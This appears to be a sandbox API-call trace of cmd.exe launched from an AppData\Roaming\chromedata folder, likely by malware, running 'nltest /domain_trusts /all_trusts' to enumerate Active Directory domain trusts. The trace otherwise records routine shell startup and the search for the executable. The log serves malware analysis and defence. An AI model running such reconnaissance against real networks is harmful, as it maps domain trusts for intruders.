	[0249.982] RegCloseKey (hKey=0x40) returned 0x0
	[0249.982] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadff7
	[0249.982] srand (_Seed=0x5cdadff7) 
	[0249.982] GetCommandLineW () returned="/c nltest /domain_trusts /all_trusts"
	[0249.982] GetCommandLineW () returned="/c nltest /domain_trusts /all_trusts"
	[0249.983] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e15260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0249.983] GetProcessHeap () returned 0x390000
	[0249.983] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x210) returned 0x3a1d48
	[0249.983] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a1d50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0249.983] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0249.983] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0249.983] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0249.983] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0249.983] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0249.983] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0249.983] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0249.983] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0249.983] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0249.983] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0249.983] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0249.983] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0249.983] GetProcessHeap () returned 0x390000
	[0249.983] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a0b38 | out: hHeap=0x390000) returned 1
	[0249.983] GetEnvironmentStringsW () returned 0x3a0230*
	[0249.983] GetProcessHeap () returned 0x390000
	[0249.983] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x912) returned 0x3a2880
	[0249.984] FreeEnvironmentStringsW (penv=0x3a0230) returned 1
	[0249.984] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0249.984] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0249.984] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0249.984] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0249.984] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0249.984] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0249.984] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0249.984] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0249.984] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0249.984] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0249.984] GetProcessHeap () returned 0x390000
	[0249.984] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x6a) returned 0x3907f0
	[0249.984] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2bf648 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0249.984] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", nBufferLength=0x104, lpBuffer=0x2bf648, lpFilePart=0x2bf644 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFilePart=0x2bf644*="chromedata") returned 0x30
	[0249.984] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 0x2010
	[0249.984] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2bf3c4 | out: lpFindFileData=0x2bf3c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc16c9120, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc16c9120, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3a00b0
	[0249.984] FindClose (in: hFindFile=0x3a00b0 | out: hFindFile=0x3a00b0) returned 1
	[0249.984] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc", lpFindFileData=0x2bf3c4 | out: lpFindFileData=0x2bf3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XC7u663GxWc", cAlternateFileName="2XC7U6~1")) returned 0x3a00b0
	[0249.984] FindClose (in: hFindFile=0x3a00b0 | out: hFindFile=0x3a00b0) returned 1
	[0249.985] _wcsnicmp (_String1="2XC7U6~1", _String2="2XC7u663GxWc", _MaxCount=0xc) returned 72
	[0249.985] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData", lpFindFileData=0x2bf3c4 | out: lpFindFileData=0x2bf3c4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc173b540, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x3a00b0
	[0249.985] FindClose (in: hFindFile=0x3a00b0 | out: hFindFile=0x3a00b0) returned 1
	[0249.985] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming", lpFindFileData=0x2bf3c4 | out: lpFindFileData=0x2bf3c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0x78fd700, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x78fd700, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0x3a00b0
	[0249.985] FindClose (in: hFindFile=0x3a00b0 | out: hFindFile=0x3a00b0) returned 1
	[0249.985] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFindFileData=0x2bf3c4 | out: lpFindFileData=0x2bf3c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x78fd700, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x744be640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x744be640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="chromedata", cAlternateFileName="CHROME~1")) returned 0x3a00b0
	[0249.985] FindClose (in: hFindFile=0x3a00b0 | out: hFindFile=0x3a00b0) returned 1
	[0249.985] _wcsnicmp (_String1="CHROME~1", _String2="chromedata", _MaxCount=0xa) returned 26
	[0249.985] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 0x2010
	[0249.985] SetCurrentDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 1
	[0249.985] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 1
	[0249.985] GetProcessHeap () returned 0x390000
	[0249.985] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a2880 | out: hHeap=0x390000) returned 1
	[0249.985] GetEnvironmentStringsW () returned 0x3a0230*
	[0249.985] GetProcessHeap () returned 0x390000
	[0249.985] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x97c) returned 0x3a1f60
	[0249.985] FreeEnvironmentStringsW (penv=0x3a0230) returned 1
	[0249.985] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e15260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0249.985] GetProcessHeap () returned 0x390000
	[0249.985] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3907f0 | out: hHeap=0x390000) returned 1
	[0249.985] GetProcessHeap () returned 0x390000
	[0249.986] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x400e) returned 0x3a3b28
	[0249.986] GetProcessHeap () returned 0x390000
	[0249.986] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x50) returned 0x3a28e8
	[0249.986] GetProcessHeap () returned 0x390000
	[0249.986] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a3b28 | out: hHeap=0x390000) returned 1
	[0249.986] GetConsoleOutputCP () returned 0x1b5
	[0249.986] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e14260 | out: lpCPInfo=0x49e14260) returned 1
	[0249.986] GetUserDefaultLCID () returned 0x409
	[0249.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e14950, cchData=8 | out: lpLCData=":") returned 2
	[0249.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2bf788, cchData=128 | out: lpLCData="0") returned 2
	[0249.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2bf788, cchData=128 | out: lpLCData="0") returned 2
	[0249.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2bf788, cchData=128 | out: lpLCData="1") returned 2
	[0249.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e14940, cchData=8 | out: lpLCData="/") returned 2
	[0249.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e14d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0249.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e14d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0249.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e14d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0249.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e14cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0249.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e14c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0249.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e14c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0249.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e14c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0249.987] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e14930, cchData=8 | out: lpLCData=".") returned 2
	[0249.987] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e14920, cchData=8 | out: lpLCData=",") returned 2
	[0249.987] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0249.988] GetProcessHeap () returned 0x390000
	[0249.988] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x0, Size=0x20c) returned 0x3a2940
	[0249.988] GetConsoleTitleW (in: lpConsoleTitle=0x3a2940, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0249.988] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0249.988] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0249.988] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0249.989] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0249.989] GetProcessHeap () returned 0x390000
	[0249.989] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x400a) returned 0x3a3b28
	[0249.989] GetProcessHeap () returned 0x390000
	[0249.989] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a3b28 | out: hHeap=0x390000) returned 1
	[0249.989] _wcsicmp (_String1="nltest", _String2=")") returned 69
	[0249.989] _wcsicmp (_String1="FOR", _String2="nltest") returned -8
	[0249.989] _wcsicmp (_String1="FOR/?", _String2="nltest") returned -8
	[0249.990] _wcsicmp (_String1="IF", _String2="nltest") returned -5
	[0249.990] _wcsicmp (_String1="IF/?", _String2="nltest") returned -5
	[0249.990] _wcsicmp (_String1="REM", _String2="nltest") returned 4
	[0249.990] _wcsicmp (_String1="REM/?", _String2="nltest") returned 4
	[0249.990] GetProcessHeap () returned 0x390000
	[0249.990] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x58) returned 0x3a2b58
	[0249.990] GetProcessHeap () returned 0x390000
	[0249.990] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x16) returned 0x3a2bb8
	[0249.990] GetProcessHeap () returned 0x390000
	[0249.990] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x40) returned 0x3a2bd8
	[0249.991] GetConsoleTitleW (in: lpConsoleTitle=0x2bf480, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0249.991] _wcsicmp (_String1="nltest", _String2="DIR") returned 10
	[0249.991] _wcsicmp (_String1="nltest", _String2="ERASE") returned 9
	[0249.991] _wcsicmp (_String1="nltest", _String2="DEL") returned 10
	[0249.991] _wcsicmp (_String1="nltest", _String2="TYPE") returned -6
	[0249.991] _wcsicmp (_String1="nltest", _String2="COPY") returned 11
	[0249.991] _wcsicmp (_String1="nltest", _String2="CD") returned 11
	[0249.991] _wcsicmp (_String1="nltest", _String2="CHDIR") returned 11
	[0249.991] _wcsicmp (_String1="nltest", _String2="RENAME") returned -4
	[0249.991] _wcsicmp (_String1="nltest", _String2="REN") returned -4
	[0249.991] _wcsicmp (_String1="nltest", _String2="ECHO") returned 9
	[0249.991] _wcsicmp (_String1="nltest", _String2="SET") returned -5
	[0249.991] _wcsicmp (_String1="nltest", _String2="PAUSE") returned -2
	[0249.991] _wcsicmp (_String1="nltest", _String2="DATE") returned 10
	[0249.991] _wcsicmp (_String1="nltest", _String2="TIME") returned -6
	[0249.991] _wcsicmp (_String1="nltest", _String2="PROMPT") returned -2
	[0249.991] _wcsicmp (_String1="nltest", _String2="MD") returned 1
	[0249.991] _wcsicmp (_String1="nltest", _String2="MKDIR") returned 1
	[0249.991] _wcsicmp (_String1="nltest", _String2="RD") returned -4
	[0249.991] _wcsicmp (_String1="nltest", _String2="RMDIR") returned -4
	[0249.991] _wcsicmp (_String1="nltest", _String2="PATH") returned -2
	[0249.991] _wcsicmp (_String1="nltest", _String2="GOTO") returned 7
	[0249.991] _wcsicmp (_String1="nltest", _String2="SHIFT") returned -5
	[0249.991] _wcsicmp (_String1="nltest", _String2="CLS") returned 11
	[0249.991] _wcsicmp (_String1="nltest", _String2="CALL") returned 11
	[0249.991] _wcsicmp (_String1="nltest", _String2="VERIFY") returned -8
	[0249.992] _wcsicmp (_String1="nltest", _String2="VER") returned -8
	[0249.992] _wcsicmp (_String1="nltest", _String2="VOL") returned -8
	[0249.992] _wcsicmp (_String1="nltest", _String2="EXIT") returned 9
	[0249.992] _wcsicmp (_String1="nltest", _String2="SETLOCAL") returned -5
	[0249.992] _wcsicmp (_String1="nltest", _String2="ENDLOCAL") returned 9
	[0249.992] _wcsicmp (_String1="nltest", _String2="TITLE") returned -6
	[0249.992] _wcsicmp (_String1="nltest", _String2="START") returned -5
	[0249.992] _wcsicmp (_String1="nltest", _String2="DPATH") returned 10
	[0249.992] _wcsicmp (_String1="nltest", _String2="KEYS") returned 3
	[0249.992] _wcsicmp (_String1="nltest", _String2="MOVE") returned 1
	[0249.992] _wcsicmp (_String1="nltest", _String2="PUSHD") returned -2
	[0249.992] _wcsicmp (_String1="nltest", _String2="POPD") returned -2
	[0249.992] _wcsicmp (_String1="nltest", _String2="ASSOC") returned 13
	[0249.992] _wcsicmp (_String1="nltest", _String2="FTYPE") returned 8
	[0249.992] _wcsicmp (_String1="nltest", _String2="BREAK") returned 12
	[0249.992] _wcsicmp (_String1="nltest", _String2="COLOR") returned 11
	[0249.992] _wcsicmp (_String1="nltest", _String2="MKLINK") returned 1
	[0249.992] _wcsicmp (_String1="nltest", _String2="DIR") returned 10
	[0249.992] _wcsicmp (_String1="nltest", _String2="ERASE") returned 9
	[0249.992] _wcsicmp (_String1="nltest", _String2="DEL") returned 10
	[0249.992] _wcsicmp (_String1="nltest", _String2="TYPE") returned -6
	[0249.992] _wcsicmp (_String1="nltest", _String2="COPY") returned 11
	[0249.992] _wcsicmp (_String1="nltest", _String2="CD") returned 11
	[0249.992] _wcsicmp (_String1="nltest", _String2="CHDIR") returned 11
	[0249.992] _wcsicmp (_String1="nltest", _String2="RENAME") returned -4
	[0249.992] _wcsicmp (_String1="nltest", _String2="REN") returned -4
	[0249.992] _wcsicmp (_String1="nltest", _String2="ECHO") returned 9
	[0249.992] _wcsicmp (_String1="nltest", _String2="SET") returned -5
	[0249.992] _wcsicmp (_String1="nltest", _String2="PAUSE") returned -2
	[0249.992] _wcsicmp (_String1="nltest", _String2="DATE") returned 10
	[0249.992] _wcsicmp (_String1="nltest", _String2="TIME") returned -6
	[0249.992] _wcsicmp (_String1="nltest", _String2="PROMPT") returned -2
	[0249.992] _wcsicmp (_String1="nltest", _String2="MD") returned 1
	[0249.992] _wcsicmp (_String1="nltest", _String2="MKDIR") returned 1
	[0249.992] _wcsicmp (_String1="nltest", _String2="RD") returned -4
	[0249.992] _wcsicmp (_String1="nltest", _String2="RMDIR") returned -4
	[0249.992] _wcsicmp (_String1="nltest", _String2="PATH") returned -2
	[0249.992] _wcsicmp (_String1="nltest", _String2="GOTO") returned 7
	[0249.992] _wcsicmp (_String1="nltest", _String2="SHIFT") returned -5
	[0249.992] _wcsicmp (_String1="nltest", _String2="CLS") returned 11
	[0249.992] _wcsicmp (_String1="nltest", _String2="CALL") returned 11
	[0249.992] _wcsicmp (_String1="nltest", _String2="VERIFY") returned -8
	[0249.992] _wcsicmp (_String1="nltest", _String2="VER") returned -8
	[0249.992] _wcsicmp (_String1="nltest", _String2="VOL") returned -8
	[0249.993] _wcsicmp (_String1="nltest", _String2="EXIT") returned 9
	[0249.993] _wcsicmp (_String1="nltest", _String2="SETLOCAL") returned -5
	[0249.993] _wcsicmp (_String1="nltest", _String2="ENDLOCAL") returned 9
	[0249.993] _wcsicmp (_String1="nltest", _String2="TITLE") returned -6
	[0249.993] _wcsicmp (_String1="nltest", _String2="START") returned -5
	[0249.993] _wcsicmp (_String1="nltest", _String2="DPATH") returned 10
	[0249.993] _wcsicmp (_String1="nltest", _String2="KEYS") returned 3
	[0249.993] _wcsicmp (_String1="nltest", _String2="MOVE") returned 1
	[0249.993] _wcsicmp (_String1="nltest", _String2="PUSHD") returned -2
	[0249.993] _wcsicmp (_String1="nltest", _String2="POPD") returned -2
	[0249.993] _wcsicmp (_String1="nltest", _String2="ASSOC") returned 13
	[0249.993] _wcsicmp (_String1="nltest", _String2="FTYPE") returned 8
	[0249.993] _wcsicmp (_String1="nltest", _String2="BREAK") returned 12
	[0249.993] _wcsicmp (_String1="nltest", _String2="COLOR") returned 11
	[0249.993] _wcsicmp (_String1="nltest", _String2="MKLINK") returned 1
	[0249.993] _wcsicmp (_String1="nltest", _String2="FOR") returned 8
	[0249.993] _wcsicmp (_String1="nltest", _String2="IF") returned 5
	[0249.993] _wcsicmp (_String1="nltest", _String2="REM") returned -4
	[0249.993] GetProcessHeap () returned 0x390000
	[0249.993] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x210) returned 0x3a2c20
	[0249.993] GetProcessHeap () returned 0x390000
	[0249.993] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x4e) returned 0x3a2e38
	[0249.993] _wcsnicmp (_String1="nlte", _String2="cmd ", _MaxCount=0x4) returned 11
	[0249.993] GetProcessHeap () returned 0x390000
	[0249.993] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x418) returned 0x3907f0
	[0249.993] SetErrorMode (uMode=0x0) returned 0x8001
	[0249.993] SetErrorMode (uMode=0x1) returned 0x0
	[0249.994] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3907f8, lpFilePart=0x2befa0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFilePart=0x2befa0*="chromedata") returned 0x30
	[0249.994] SetErrorMode (uMode=0x8001) returned 0x1
	[0249.994] GetProcessHeap () returned 0x390000
	[0249.994] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x3907f0, Size=0x78) returned 0x3907f0
	[0249.994] GetProcessHeap () returned 0x390000
	[0249.994] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x3907f0) returned 0x78
	[0249.994] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0249.994] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0249.994] GetProcessHeap () returned 0x390000
	[0249.994] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x17e) returned 0x3a2e90
	[0249.994] GetProcessHeap () returned 0x390000
	[0249.994] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x2f4) returned 0x390870
	[0250.000] GetProcessHeap () returned 0x390000
	[0250.000] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x390870, Size=0x180) returned 0x390870
	[0250.000] GetProcessHeap () returned 0x390000
	[0250.000] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x390870) returned 0x180
	[0250.000] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0250.000] GetProcessHeap () returned 0x390000
	[0250.000] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xe0) returned 0x3a3018
	[0250.000] GetProcessHeap () returned 0x390000
	[0250.000] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x3a3018, Size=0x76) returned 0x3a3018
	[0250.000] GetProcessHeap () returned 0x390000
	[0250.000] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x3a3018) returned 0x76
	[0250.001] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0250.001] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\nltest.*", fInfoLevelId=0x1, lpFindFileData=0x2bed1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bed1c) returned 0xffffffff
	[0250.001] GetLastError () returned 0x2
	[0250.001] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\nltest", fInfoLevelId=0x1, lpFindFileData=0x2bed1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bed1c) returned 0xffffffff
	[0250.001] GetLastError () returned 0x2
	[0250.001] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0250.001] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\nltest.*", fInfoLevelId=0x1, lpFindFileData=0x2bed1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bed1c) returned 0xffffffff
	[0250.002] GetLastError () returned 0x2
	[0250.002] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\nltest", fInfoLevelId=0x1, lpFindFileData=0x2bed1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bed1c) returned 0xffffffff
	[0250.002] GetLastError () returned 0x2
	[0250.002] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0250.002] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\nltest.*", fInfoLevelId=0x1, lpFindFileData=0x2bed1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bed1c) returned 0x3a3098
	[0250.002] GetProcessHeap () returned 0x390000
	[0250.002] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x0, Size=0x14) returned 0x3a30d8
	[0250.002] FindClose (in: hFindFile=0x3a3098 | out: hFindFile=0x3a3098) returned 1
	[0250.002] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\nltest.COM", fInfoLevelId=0x1, lpFindFileData=0x2bed1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bed1c) returned 0xffffffff
	[0250.002] GetLastError () returned 0x2
	[0250.003] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\nltest.EXE", fInfoLevelId=0x1, lpFindFileData=0x2bed1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bed1c) returned 0x3a3098
	[0250.003] GetProcessHeap () returned 0x390000
	[0250.003] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x3a30d8, Size=0x4) returned 0x3a30d8
	[0250.003] FindClose (in: hFindFile=0x3a3098 | out: hFindFile=0x3a3098) returned 1
	[0250.003] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0250.003] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0250.003] GetConsoleTitleW (in: lpConsoleTitle=0x2bf214, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0250.004] InitializeProcThreadAttributeList (in: lpAttributeList=0x2bf09c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2bf164 | out: lpAttributeList=0x2bf09c, lpSize=0x2bf164) returned 1
	[0250.004] UpdateProcThreadAttribute (in: lpAttributeList=0x2bf09c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2bf15c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2bf09c, lpPreviousValue=0x0) returned 1
	[0250.004] GetStartupInfoW (in: lpStartupInfo=0x2bf058 | out: lpStartupInfo=0x2bf058*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x160, hStdOutput=0x154, hStdError=0x154)) 
	[0250.004] GetProcessHeap () returned 0x390000
	[0250.004] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x18) returned 0x3a3098
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
